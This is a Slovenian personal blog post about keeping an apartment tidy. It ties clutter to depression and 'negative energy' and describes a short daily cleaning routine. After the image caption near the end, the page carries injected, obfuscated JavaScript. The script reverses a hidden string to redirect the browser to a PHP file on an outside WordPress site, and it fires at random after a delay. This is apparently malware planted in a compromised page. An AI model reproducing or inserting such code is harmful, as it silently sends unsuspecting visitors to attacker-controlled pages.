Kako do čistega stanovanja

Čistost prostora je zelo pomembna za človeka, saj se v čistem prostoru energija lažje giblje in se ne kopiči.

Kolikokrat sem bila na obiskih pri prijateljih, ki so imeli stanovanje vedno pospravljeno. V takem stanovanju sem se počutila prijetno, a ni mi bilo jasno, kako jim to uspe. Sama namreč prihajam iz družine, kjer nikoli nismo imeli takega stanovanja. Moja soba je izgledala, kot bi vanjo treščila bomba in, če sem želela k sebi povabiti koga novega, sem vedno raje izpeljala tako, da smo bili nekje zunaj. V mojo sobo so hodile le dobre prijateljice, ki se niso ozirale na čistočo. Vsaj ne na glas.

V moji sobi se je kopičila krama. Imela sem ogromno stvari, ki sem jih hranila iz takšnih in drugačnih razlogov. Ob enem pa nisem bila vešča pospravljanja. Moja pisalna miza je bila prepolna stvari, pod posteljo je ležalo bog vedi kaj vse, omare so bile polne oblek, ki jih sploh nisem več nosila. Zdaj, ko gledam nazaj, se sploh ne čudim, da sem zapadla v depresijo. Definitivno bi se počutila bolje v čistem okolju.

Tako je z energijo. Ko je v prostoru polno krame in ima vsak njen delček svojo energijo, dobiš en kup energije. Ampak trik je v tem, da negativna energija slej ko prej “poje” pozitivno. Sploh, če stvari pustiš ležati tam dlje časa. Že sama umazanija je negativna, s kupom krame pa dobiš eno neprijetno nasičeno okolje. Torej kaj s tem?

Sobe mi nikoli ni uspelo zares pospraviti. Se pa pospravljanja učim zdaj.
Začnem tako, da najprej iz vseh površin odstranim predmete, ki tja ne spadajo. Te se na njih naberejo prav vsak dan. Ko so vse stvari na svojih mestih, je čas za sesanje, pometanje in brisanje. Otresanje pregrinjal, čiščenje površin, … Dejansko vse skupaj nikoli ne vzame dve uri časa. K večjemu pol ure dnevno, toliko prostega časa pa ima vsak.

In še najpomembnejše:
Ko se v pospravljenem prostoru usedeš, se lahko resnično odpočiješ, saj te ne obdaja nič negativnega.

Ko je prostor čist, so čiste tudi misli. Čiste misli pa zagotovo vodijo v boljše življenje.

Z Ljubeznijo;
(Ni)Si

Prikazana slika:  $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/cleaning-home?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

One Comment